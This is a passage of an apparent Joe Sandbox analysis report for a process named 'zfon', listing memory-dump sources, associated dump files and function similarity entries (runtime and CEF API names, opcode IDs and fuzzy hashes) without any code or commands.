                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: DecodePointerfreeterminate
                                                                                                • String ID: csm
                                                                                                • API String ID: 1319892530-1018135373
                                                                                                • Opcode ID: 6134b3d9ee8e42ecd0a282cc438d3bc65ec7692e143b46020cd19bf630b9a02f
                                                                                                • Instruction ID: 28d0d0dbb3f22e7d8742c925fccbe3f51e6f18d1f14435d5aa2c10c244dc43a8
                                                                                                • Opcode Fuzzy Hash: 6134b3d9ee8e42ecd0a282cc438d3bc65ec7692e143b46020cd19bf630b9a02f
                                                                                                • Instruction Fuzzy Hash: FA111D62D0EA8585EF659F2DD45423863A0EF45FE9F188235CF6D072A0CF2CD487C201
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set
                                                                                                • API String ID: 1099746521-3882152299
                                                                                                • Opcode ID: 8835a64955ff740848f4301bfa056b50858cadad722b641384f192b5b9dc1ffd
                                                                                                • Instruction ID: e3c3c033d3bab00de16a9857e49cde8399b4879568ed5166c5154684538fc0f9
                                                                                                • Opcode Fuzzy Hash: 8835a64955ff740848f4301bfa056b50858cadad722b641384f192b5b9dc1ffd
                                                                                                • Instruction Fuzzy Hash: F301FD21E2C9C692FF249F2CD4117BA2261DF80BC4F284035DB2E45995EE6EEA078610
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFAD3524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FF8BFAD1222), ref: 00007FF8BFAD3564
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFAD12A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 661698970-2671469338
                                                                                                • Opcode ID: 0aa23b011ebb7a1bca7b1b5cf97d93ad35b1e0d7ec6c205f0ee7290f04a45704
                                                                                                • Instruction ID: 684bacdf53ff7b741daac7ede5873c5be5463720947c9a0c69bb2c7d6f17d6c5
                                                                                                • Opcode Fuzzy Hash: 0aa23b011ebb7a1bca7b1b5cf97d93ad35b1e0d7ec6c205f0ee7290f04a45704
                                                                                                • Instruction Fuzzy Hash: C8F0AF3E91860A87E7386B98E18206877F8FF49BC8F08B070D708422D2CF3CD5A0CA00
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB52A8E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 661698970-2671469338
                                                                                                • Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                                • Instruction ID: 3a169f9bc03c5a54b9ccd961e9b3fed8cfa373b3823a7e47e47856a0bf8de5e0
                                                                                                • Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                                • Instruction Fuzzy Hash: E9F0493292961786E7A46BE9E19206D37A4EF8CB81F199035D74806652CF3CF4A0CB01
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: e9784d97df34b852811b729b75ab69608f0340d97476c982831835ccf36363d0
                                                                                                • Instruction ID: 9d39dcc8576e7e48c05903a96489429fe56820ab47bde3fcfb7a58083eb5d219
                                                                                                • Opcode Fuzzy Hash: e9784d97df34b852811b729b75ab69608f0340d97476c982831835ccf36363d0
                                                                                                • Instruction Fuzzy Hash: EA513E36B49F4181EB01EF28D89826873B5FB44B94F544636CB2D473A8EF39C854C764
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1669350605-0
                                                                                                • Opcode ID: 97cef294c8234e24996934a69e811e08a35bd6dc2cc65fa79cb0f422811af0d6
                                                                                                • Instruction ID: e18b5922b50408db306d4f56e8fa841925b4b105ad7a4f77919a9005a99b0daf
                                                                                                • Opcode Fuzzy Hash: 97cef294c8234e24996934a69e811e08a35bd6dc2cc65fa79cb0f422811af0d6
                                                                                                • Instruction Fuzzy Hash: 00E19B26B18A86D9EF119F69C4442AC6BB1FB68B84F544132DF4D57BA4EF3CD64AC300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1669350605-0
                                                                                                • Opcode ID: b568904929ef177ea3e5454489a4b32e3a5935e52dbc23fadad983666b9a9220
                                                                                                • Instruction ID: 4c22434ac7fd3ffe52c534d17d1d1e4fd6fe933afb57cc81890880823bc60e9a
                                                                                                • Opcode Fuzzy Hash: b568904929ef177ea3e5454489a4b32e3a5935e52dbc23fadad983666b9a9220
                                                                                                • Instruction Fuzzy Hash: 3AE19722B18A82D9EF119F69D4442AC67B1BB58BC8F644132DF4D53BA4EF3CD64AC300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 5e4904112bc70dfaf0cd0831b4c3e5b204e79148fe6a76846035a198c2a67414
                                                                                                • Instruction ID: 7c205dc031f8362b1782294a1390928d186fe21c07b3eebf3757d025a0ba783a
                                                                                                • Opcode Fuzzy Hash: 5e4904112bc70dfaf0cd0831b4c3e5b204e79148fe6a76846035a198c2a67414
                                                                                                • Instruction Fuzzy Hash: B501A72195D98181DB12FF20D84537CA3B5FB84BB8F905630DA3D4A5DDCF39D49183A9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 2943138195-0
                                                                                                • Opcode ID: 3527a2ec92af913d7f7e1f06c3a52e2048bea7df529658eb449da16ed24f77af
                                                                                                • Instruction ID: 914d556eb92d3d2b1f0ee1a7fed63a094c28d980585fcad89cc1256fdeb88462
                                                                                                • Opcode Fuzzy Hash: 3527a2ec92af913d7f7e1f06c3a52e2048bea7df529658eb449da16ed24f77af
                                                                                                • Instruction Fuzzy Hash: F6916962E08A5699FB118FE8D8603BCB7B5BB04788F544036DF4D2B699DF7CA846C340
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                • Instruction ID: 089eada996e512019073c8595b1f2424946dc4edb7d64e84c43b5694070f798f
                                                                                                • Opcode Fuzzy Hash: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                • Instruction Fuzzy Hash: EB714022B09B81CAEB11DFB5E8402AD7BB5EB48798F444035DE5D23B9DCE38D466C364
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 178571748c1f6b41fb67adfce5d8230ea5df66adfb37037394259fba66d6769e
                                                                                                • Instruction ID: ab8242f5f02cc8278418bcca364658cdb9e1b2842d4622b160f8f2098ea9d65b
                                                                                                • Opcode Fuzzy Hash: 178571748c1f6b41fb67adfce5d8230ea5df66adfb37037394259fba66d6769e
                                                                                                • Instruction Fuzzy Hash: C0618D62B05B4185EB04EF65E8402ADABB2FF44B98F898035DE2D177D9EF38D455C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 811f5f7df03e4e301300a13012f2cad1700dfafc7e0f81aadfde158a6b6bfa72
                                                                                                • Instruction ID: b3f00ed02db09099ed1e6a7963bf636c59dec25e38cd92176596f6c1cb441ed0
                                                                                                • Opcode Fuzzy Hash: 811f5f7df03e4e301300a13012f2cad1700dfafc7e0f81aadfde158a6b6bfa72
                                                                                                • Instruction Fuzzy Hash: E1619E62B05B4185EB04EF65D8502ADA7B1FB44B98F888035DE2D177D9EF38E449C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID: H
                                                                                                • API String ID: 1294909896-2852464175
                                                                                                • Opcode ID: 8f5110f9e4781b45c3775bc87bf2a545de0990f1d9289061d4064065fc1216d8
                                                                                                • Instruction ID: 4c02428e58780f5d98a6308e485e41e5dcd7bf5e803dda57c041e2e89eaf4359
                                                                                                • Opcode Fuzzy Hash: 8f5110f9e4781b45c3775bc87bf2a545de0990f1d9289061d4064065fc1216d8
                                                                                                • Instruction Fuzzy Hash: B061603260AB4582EB25DF15D944228B7B5FB45B88F588439CBBD07798FF38E4A0C390
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2675522757-0
                                                                                                • Opcode ID: bcef8a7eb3371c1d10f51197cd9fa49dbabc02a3fcdca66b90c5840cacfef3be
                                                                                                • Instruction ID: aed3f142459158b11598c982d661d357f399a12f283a79c5b3d5dda9e9b97123
                                                                                                • Opcode Fuzzy Hash: bcef8a7eb3371c1d10f51197cd9fa49dbabc02a3fcdca66b90c5840cacfef3be
                                                                                                • Instruction Fuzzy Hash: 6E51082250974141EF24BF25D8407BAE3B2EF84B94FA80534DA6D0B7E9DF3DE48187A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 764de21c2739535333701c34ddd89eb00324bc8f6fca46ffdd7256b3f34d3a35
                                                                                                • Instruction ID: 280bd3f6bda46691baced7741f7b888a3292621d8d56f11975cd03c0875e8dac
                                                                                                • Opcode Fuzzy Hash: 764de21c2739535333701c34ddd89eb00324bc8f6fca46ffdd7256b3f34d3a35
                                                                                                • Instruction Fuzzy Hash: 9641A172609B8185EB659F15E800269B7B6FB44B98F988135CFAD07798FF3CD485C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 38c0154fc2ebe3a2842d2e6c07cffeee60fb038aafe1afa7b16cf9b35fa85edf
                                                                                                • Instruction ID: 58a05cdd69e79284b4171037fbe6667bdc3ab9dfac37141fa130f668a9c7a8ef
                                                                                                • Opcode Fuzzy Hash: 38c0154fc2ebe3a2842d2e6c07cffeee60fb038aafe1afa7b16cf9b35fa85edf
                                                                                                • Instruction Fuzzy Hash: E5419072609B8184EB659F15E90026AB7B1FB44B98F988135DF6D07798FF3CD845C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
